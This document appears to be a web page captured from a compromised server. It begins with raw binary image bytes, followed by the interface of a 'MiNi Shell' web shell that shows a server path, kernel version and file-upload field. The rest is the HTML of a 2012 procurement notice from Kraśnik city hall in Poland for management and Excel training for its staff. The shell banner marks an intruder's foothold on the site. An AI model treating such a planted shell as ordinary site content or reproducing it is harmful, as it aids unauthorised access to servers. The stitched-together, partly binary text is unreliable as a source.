JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120119/18223-N-2012.html

<p class="kh_header"><b>Kraśnik: Zorganizowanie i przeprowadzenie szkoleń w ramach projektu Nowoczesne usługi - nowoczesny urzędnik</b><br>
<b>Numer ogłoszenia: 18223 - 2012; data zamieszczenia: 19.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Kraśnika , ul. Lubelska 84, 23-200 Kraśnik, woj. lubelskie, tel. 081 8251540, faks 081 8252709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krasnik.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń w ramach projektu Nowoczesne usługi - nowoczesny urzędnik.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie wyjazdowego szkolenia dla pracowników Urzędu Miasta Kraśnik na temat Trening umiejętności kierowniczych oraz zorganizowanie i przeprowadzenie szkolenia stacjonarnego dla pracowników Urzędu Miasta Kraśnik na temat Excel na potrzeby urzędu. Szkolenia zostaną zorganizowane 
w ramach projektu Nowoczesne usługi - nowoczesny urzędnik. Projekt jest finansowany w ramach Europejskiego Funduszu Społecznego PO KL, Priorytet V. Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej. 
2.	Zamówienie jest podzielone na 2 zadania:
1)	zadanie nr 1 - zorganizowanie i przeprowadzenie szkolenia Trening umiejętności kierowniczych,
2)	 zadanie nr 2 - zorganizowanie i przeprowadzenie szkolenia Excel na potrzeby urzędu.
3.	Zadanie nr 1 (zorganizowanie i przeprowadzenie szkolenia Trening umiejętności kierowniczych):
a)	szkolenie realizowane będzie w dwóch etapach (2 etapy po 2 dni, łącznie 4 dni szkoleniowe dla 2 grup) i obejmować będzie 16 uczestników (pracownicy Urzędu Miasta Kraśnik) - 2 grupy x 8 osób, przy czym Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników planowanych do objęcia szkoleniem o nie więcej niż 2 osoby w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika szkolenia, sprawowanie opieki nad chorym członkiem rodziny, rozwiązanie stosunku pracy, itp.),
b)	szkolenie obejmować będzie łącznie 64 godzin lekcyjnych - 2 grupy x 32 h (godzina lekcyjna zajęć liczy 45 minut i 15 minut przerwy, przy czym długość przerw może być ustalana elastycznie), 
c)	zajęcia przeprowadzone będą w dni robocze (od poniedziałku do piątku) w przedziale czasowym od 9:00 do 17:00, z zastrzeżeniem, że liczba godzin zajęć szkoleniowych 
w ciągu jednego dnia nie przekroczy 8 godzin zegarowych,
d)	Wykonawca zapewni do prowadzenia zajęć osobę/osoby posiadające odpowiednią wiedzę i doświadczenie w realizacji szkoleń z zakresu treningu umiejętności kierowniczych,
e)	Zakres szkolenia obejmuje co najmniej:
	interesy i stanowiska w relacji szef - pracownik,
	sposoby uzasadniania interwencji szefowskich,
	język szefa wzmacniający jego autorytet,
	komunikowanie pracownikom trudnych decyzji, bronienie własnych postanowień,
	delegowanie zadań,
	motywowanie pracowników z mocy szefowskiej,
	zasady karania i nagradzania pracowników wzmacniające ich odpowiedzialność 
i zaangażowanie,
	 repertuar kar i nagród.
f)	Cele szkolenia to przede wszystkim:
	wzmocnienie szczebla kierowniczego w Urzędzie,
	podniesienie poziomu realizowanych działań (zgodnie z II Filarem Dobrego Rządzenia),
	zwiększenie efektywności pracy kierowników oraz podległych im zespołów,
	podniesienie poziomu umiejętności radzenia sobie w trudnych sytuacjach  kierownik - pracownik.
g)	Szkolenie będzie prowadzone głównie metodą warsztatową (ćwiczenia, symulacje, scenki) i będzie opierało się na realnych sytuacjach urzędników i ich problemach. 
h)	Wykonawca zobowiązany jest do zorganizowania 2 odrębnych szkoleń wyjazdowych. Zamawiający nie zezwala na łączenie grup wyjazdowych (tj. organizowanie szkoleń 
w tym samym ośrodku i tym samym terminie dla obu grup). Wykonawca może zorganizować oba szkolenia w jednym ośrodku lub w różnych ośrodkach dla każdej grupy.
i)	Wykonawca zapewnia uczestnikom szkolenia zakwaterowanie wraz z noclegiem 
w hotelu o standardzie co najmniej dwugwiazdkowym  lub obiekcie hotelarskim spełniającym wymagania dla hotelu o standardzie co najmniej dwugwiazdkowym, znajdującym się poza granicami miasta Kraśnik, jednak w odległości nie większej niż 250 km, w miejscowości wypoczynkowej lub atrakcyjnej turystycznie. Wykonawca zapewni zakwaterowania uczestnikom warsztatów w pokojach 1-2 osobowych (co najmniej 2 pokoje 1-osobowe) z  pełnym węzłem sanitarnym tj. umywalka, wc, natrysk lub wanna. Zamawiający nie dopuszcza zakwaterowania w domkach letniskowych. Uczestnicy zakwaterowani powinni być w jednym budynku albo ośrodku Zajęcia szkoleniowe odbywać się będą w tym samym budynku, w którym zakwaterowani będą uczestnicy szkolenia, Zajęcia szkoleniowe zostaną przeprowadzone w pomieszczeniu z odpowiednim oświetleniem oraz dostępem do światła dziennego (z możliwością zaciemnienia okien), ogrzewaniem i klimatyzacją, dostosowanym do prowadzenia zajęć szkoleniowych, zapewnionym zapleczem, posiadającym odpowiednie warunki sanitarne, bezpieczeństwa i higieny pracy, akustyczne i jakościowe, którego powierzchnia, ilość stanowisk oraz wyposażenie 
w sprzęt i pomoce dydaktyczne dostosowana jest do zakresu szkolenia oraz liczby uczestników szkolenia.
j)	Wykonawca zapewnia uczestnikom szkolenia wyżywienie obejmujące obiad i 2 przerwy kawowe (w każdym z dni szkoleniowych). Posiłki będą podawane w innej sali niż sala wykładowa. Wykonawca zapewnia wydanie posiłku jednocześnie dla wszystkich uczestników danego szkolenia. Obiad składa się przynajmniej z:
	zupy (po min. 350 ml),
	dania głównego: ziemniaki zamiennie z ryżem (każde po min. 200g) + sztuka mięsa (min. 150 g - bez sosu, z sosem min. 170 g) lub kotlet schabowy (min. 150 g) lub drób (min. 150 g) lub ryba (min. 150 g) + warzywa gotowane lub zestaw surówek z warzyw (min. 200 g),
	deser (ciasto, i owoc),
	napoje. 
Podane gramatury dot. produktów po obróbce cieplnej. Wszystkie składniki obiadów podawanych w poszczególnych dniach szkolenia powinny być różne. Obiad dla każdego uczestnika powinien być podany na ciepło na zastawie ceramicznej 
z kompletem sztućców metalowych i serwetek. Obiad może być dostarczony jako wyporcjowany lub porcjowanie może odbywać się w chwili podawania obiadu. 
W trakcie przerw kawowych Wykonawca zapewnia serwis kawowy składający się przynajmniej z: świeżoparzonej, gorącej kawy, gorącej wody, herbaty w torebkach jednorazowych, różnorodnych soków, wody mineralnej gazowanej i niegazowanej, 3 rodzajów ciastek, owoców. 
Wykonawca zapewnia serwis gastronomiczny (zastawa, przygotowanie i sprzątanie) 
w każdym dniu szkolenia.
k)	Wykonawca zobowiązany jest zapewnić wszystkim uczestnikom szkolenia:
	materiały szkoleniowe w formie papierowej - zgodne z tematyką szkolenia, 
w skład których wchodzą w szczególności: skrypty lub inne niezbędne pomoce naukowe, akty prawne, wzory dokumentów i formularzy z zakresu objętego tematem szkolenia przekazywane każdemu uczestnikowi na własność. Materiały szkoleniowe mają być przekazane uczestnikom szkolenia w momencie  rozpoczęcia szkolenia, bądź na bieżąco zgodnie z realizowanym tematem zajęć. Materiały szkoleniowe, które uczestnik otrzyma na własność muszą być nowe, nieużywanie, adekwatne do treści szkolenia, z obowiązującym stanem prawnym oraz dobre jakościowo. Materiały szkoleniowe muszą spełniać Wytyczne Dotyczące Oznaczania Projektów w Ramach Programu Operacyjnego Kapitał Ludzki (Wytyczne zostały zamieszczone na stronie internetowej Zamawiającego http://bip.krasnik.eu/index.php?id=39 jako  załącznik do SIWZ),
	dostęp do pomieszczeń sanitarnych w budynku, w pobliżu pomieszczenia, 
w którym odbywać się będą zajęcia szkoleniowe (wc, umywalka z dostępem do ciepłej wody),
	ubezpieczenie od następstw nieszczęśliwych wypadków wszystkich uczestników szkolenia przez cały okres jego trwania,
	niezbędny sprzęt, maszyny, narzędzia i urządzenia na czas trwania szkolenia, 
w tym projektor multimedialny, ekran oraz tablicę demonstracyjną flipchart 
z zapasem kartek,
	dokładny rozkład zajęć odpowiadający harmonogramowi szkolenia z podanymi tematami wynikającymi z programu szkolenia, który będzie wydany każdemu uczestnikowi w dniu rozpoczęcia szkolenia,
l)	Wykonawca będzie prowadził dokumentację przebiegu szkolenia składającą się z: dziennika zajęć edukacyjnych zawierający listę obecności uwzględniającą podpisy uczestników szkolenia oraz wymiar godzin i tematy zajęć edukacyjnych, potwierdzenia wydania uczestnikom szkolenia materiałów dydaktycznych, posiłków, noclegów oraz ankiet wypełnionych przez uczestników szkolenia służących do jego oceny. Ankiety zostaną przygotowane przez Wykonawcę.
m)	Opracowanie i wydruk zaświadczeń potwierdzających udział w cyklu szkoleń w ilości odpowiadającej liczbie uczestników zapewnia Zamawiający. Wykonawca odpowiada za podpisanie przez osoby prowadzące zaświadczeń oraz za przekazanie ich za potwierdzeniem odbioru każdemu uczestnikowi po zakończeniu udziału w cyklu szkoleń.
n)	Wykonawca jest bezpośrednio odpowiedzialny za przygotowanie, przeprowadzenie 
i obsługę szkolenia.
o)	Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia.
p)	Wykonawca zobowiązany jest do niezwłocznego dostarczenia Zamawiającemu po zakończeniu szkolenia dokumentacji obejmującej: oryginały list obecności wraz 
z podpisami uczestników szkolenia, potwierdzenie wydania uczestnikom szkolenia materiałów dydaktycznych, posiłków i noclegów oraz ankiety wypełnione przez uczestników szkolenia służące do jego oceny.
q)	Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. 
r)	Termin wykonania zamówienia: do 31.03.2012 r., przy czym Zamawiający z co najmniej tygodniowym wyprzedzeniem przed planowanym terminem rozpoczęcia szkolenia poinformuje Wykonawcę o terminie jego rozpoczęcia i zakończenia.
4.	Zadanie nr 2 (zorganizowanie i przeprowadzenie szkolenia Excel na potrzeby urzędu):
a)	Szkolenie jest szkoleniem stacjonarnym - w granicach administracyjnych miasta Kraśnik.
b)	Szkolenie obejmować będzie 30 uczestników (pracownicy Urzędu Miasta Kraśnik) -2 grupy x 15 osób, przy czym Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników planowanych do objęcia szkoleniem o nie więcej niż 2 osoby 
w wyniku nieprzewidzianych zdarzeń losowych (np. choroba uczestnika szkolenia, sprawowanie opieki nad chorym członkiem rodziny, rozwiązanie stosunku pracy, itp.).
c)	Szkolenie obejmować będzie łącznie 32 godzin lekcyjnych - 2 grupy x 16 h (godzina lekcyjna zajęć liczy 45 minut i 15 minut przerwy, przy czym długość przerw może być ustalana elastycznie).
d)	Zajęcia przeprowadzone będą w dni robocze od poniedziałku do piątku w przedziale czasowym od 7.30 do 15.30, z zastrzeżeniem, że liczba godzin zajęć szkoleniowych 
w ciągu jednego dnia nie przekroczy 8 godzin zegarowych
e)	Wykonawca zapewni do prowadzenia zajęć osobę/osoby posiadające odpowiednią wiedzę i doświadczenie w realizacji szkoleń z zakresu obsługi programu Excel.
f)	Zakres szkolenia obejmuje co najmniej:
	budowanie i edycja arkusza,
	najczęstsze operacje w Excelu,
	listy płac,
	rozliczanie delegacji,
	obliczenia,
	budowanie tabel,
	formatowanie treści i tabel,
	graficzne prezentacje danych,
	elementy analizy danych.
g)	Cele szkolenia to przede wszystkim:
	podwyższenie umiejętności z zakresu korzystania z Excel,
	wzrost efektywności przygotowań raportów, zestawień w UMK.
h)	Wykonawca we własnym zakresie zorganizuje salę szkoleniową na terenie miasta Kraśnik. Zajęcia szkoleniowe mają być przeprowadzone w pomieszczeniu 
z odpowiednim oświetleniem oraz dostępem do światła dziennego (z możliwością zaciemnienia okien), ogrzewaniem i klimatyzacją, dostosowanym do prowadzenia zajęć szkoleniowych, zapewnionym zapleczem, posiadającym odpowiednie warunki sanitarne, bezpieczeństwa i higieny pracy, akustyczne i jakościowe, którego powierzchnia, ilość stanowisk oraz wyposażenie w sprzęt (komputer lub laptop 
z odpowiednim oprogramowaniem) i pomoce dydaktyczne dostosowana jest do zakresu szkolenia oraz liczby uczestników szkolenia.
i)	Wykonawca zapewnia uczestnikom szkolenia wyżywienie obejmujące obiad i 2 przerwy kawowe (w każdym z dni szkoleniowych). Posiłki będą podawane w innej sali niż sala wykładowa. Wykonawca zapewnia wydanie posiłku jednocześnie dla wszystkich uczestników danego szkolenia. Obiad składa się przynajmniej z:
	zupy (po min. 350 ml),
	dania głównego: ziemniaki zamiennie z ryżem (każde po min. 200g) + sztuka mięsa (min. 150 g - bez sosu, z sosem min. 170 g) lub kotlet schabowy (min. 150 g) lub drób (min. 150 g) lub ryba (min. 150 g) + warzywa gotowane lub zestaw surówek z warzyw (min. 200 g),
	deser (ciasto, i owoc),
	napoje. 
Podane gramatury dot. produktów po obróbce cieplnej. Wszystkie składniki obiadów podawanych w poszczególnych dniach szkolenia powinny być różne. Obiad dla każdego uczestnika powinien być podany na ciepło na zastawie ceramicznej 
z kompletem sztućców metalowych i serwetek. Obiad może być dostarczony jako wyporcjowany lub porcjowanie może odbywać się w chwili podawania obiadu. 
W trakcie przerw kawowych Wykonawca zapewnia serwis kawowy składający się przynajmniej z: świeżoparzonej, gorącej kawy, gorącej wody, herbaty w torebkach jednorazowych, różnorodnych soków, wody mineralnej gazowanej i niegazowanej, 3 rodzajów ciastek, owoców. 
Wykonawca zapewnia serwis gastronomiczny (zastawa, przygotowanie i sprzątanie) 
w każdym dniu szkolenia.
j)	Wykonawca zobowiązany jest zapewnić wszystkim uczestnikom szkolenia:
	materiały szkoleniowe w formie papierowej - zgodne z tematyką szkolenia, 
w skład których wchodzą w szczególności: skrypty lub inne niezbędne pomoce naukowe, akty prawne, wzory dokumentów i formularzy z zakresu objętego tematem szkolenia przekazywane każdemu uczestnikowi na własność. Materiały szkoleniowe mają być przekazane uczestnikom szkolenia w momencie  rozpoczęcia szkolenia, bądź na bieżąco zgodnie z realizowanym tematem zajęć. Materiały szkoleniowe, które uczestnik otrzyma na własność muszą być nowe, nieużywanie, adekwatne do treści szkolenia, z obowiązującym stanem prawnym oraz dobre jakościowo. Materiały szkoleniowe muszą spełniać Wytyczne Dotyczące Oznaczania Projektów w Ramach Programu Operacyjnego Kapitał Ludzki (Wytyczne zostały zamieszczone na stronie internetowej Zamawiającego http://bip.krasnik.eu/index.php?id=39 jako  załącznik do SIWZ),
	dostęp do pomieszczeń sanitarnych w budynku, w pobliżu pomieszczenia, 
w którym odbywać się będą zajęcia szkoleniowe (wc, umywalka z dostępem do ciepłej wody),
	niezbędny sprzęt, maszyny, narzędzia i urządzenia na czas trwania szkolenia, 
w tym projektor multimedialny, ekran oraz tablicę demonstracyjną flipchart 
z zapasem kartek,
	dokładny rozkład zajęć odpowiadający harmonogramowi szkolenia z podanymi tematami wynikającymi z programu szkolenia, który będzie wydany każdemu uczestnikowi w dniu rozpoczęcia szkolenia,
k)	Wykonawca będzie prowadził dokumentację przebiegu szkolenia składającą się z: dziennika zajęć edukacyjnych zawierający listę obecności uwzględniającą podpisy uczestników szkolenia oraz wymiar godzin i tematy zajęć edukacyjnych, potwierdzenia wydania uczestnikom szkolenia materiałów dydaktycznych i posiłków oraz ankiet wypełnionych przez uczestników szkolenia służących do jego oceny. Ankiety zostaną przygotowane przez Wykonawcę.
l)	Wykonawca jest bezpośrednio odpowiedzialny za przygotowanie, przeprowadzenie 
i obsługę szkolenia.
m)	Wykonawca nie może pobierać żadnych opłat od uczestników szkolenia.
n)	Wykonawca zobowiązany jest do niezwłocznego dostarczenia Zamawiającemu po zakończeniu szkolenia dokumentacji obejmującej: oryginały list obecności wraz 
z podpisami uczestników szkolenia, potwierdzenie wydania uczestnikom szkolenia materiałów dydaktycznych, posiłków oraz ankiety wypełnione przez uczestników szkolenia służące do jego oceny.
o)	Opracowanie i wydruk zaświadczeń potwierdzających udział w cyklu szkoleń w ilości odpowiadającej liczbie uczestników zapewnia Zamawiający. Wykonawca odpowiada za podpisanie przez osoby prowadzące zaświadczeń oraz za przekazanie ich u za potwierdzeniem odbioru każdemu uczestnikowi po zakończeniu udziału w cyklu szkoleń.
p)	Zamawiający zastrzega sobie prawo kontrolowania przebiegu, sposobu prowadzenia oraz efektywności szkolenia i frekwencji uczestników, wglądu do prowadzonej dokumentacji. 
q)	Termin wykonania zamówienia: do 31.03.2012 r., przy czym Zamawiający z co najmniej tygodniowym wyprzedzeniem przed planowanym terminem rozpoczęcia szkolenia poinformuje Wykonawcę o terminie jego rozpoczęcia i zakończenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.42.00.00-4, 80.51.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dotyczącego posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania należy przedłożyć oświadczenie stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia oceniony zostanie na podstawie wykazu usług (z podaniem ich wartości, przedmiotu, dat wykonania 
i odbiorców) wykonanych w ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie (załącznik nr 3 do SIWZ). Warunek zostanie uznany za spełniony, jeżeli w tych latach  Wykonawca wykonał lub wykonuje:
a)	zadanie nr 1 - co najmniej 2 usługi szkoleniowe grup co najmniej 7 osobowych 
w zakresie treningu umiejętności kierowniczych, 
b)	zadanie nr 2 - co najmniej 2 usługi szkoleniowe grup co najmniej 10 osobowych 
w zakresie obsługi programu Excel.
Należy załączyć dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie (referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia oceniony zostanie na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 4 do SIWZ). Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże się dysponowaniem: 
a)	zadanie nr 1 - co najmniej 1 osobą, do przeprowadzenia szkolenia będącego przedmiotem zamówienia, posiadającą co najmniej wykształcenie wyższe magisterskie oraz doświadczenie w prowadzeniu szkoleń z treningu umiejętności kierowniczych - min. 2 usługi prowadzenia szkoleń z treningu umiejętności kierowniczych wykonane w ostatnich 3 latach przed upływem terminu składania ofert.
b)	zadanie nr 2 - co najmniej 1 osobą, do przeprowadzenia szkolenia będącego przedmiotem zamówienia, posiadającą co najmniej wykształcenie wyższe magisterskie oraz doświadczenie w prowadzeniu szkoleń z obsługi programu Excel - min. 2 usługi prowadzenia szkoleń z obsługi programu Excel wykonane w ostatnich 3 latach przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym  oceniony zostanie na podstawie oświadczenia stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej oceniony zostanie na podstawie oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

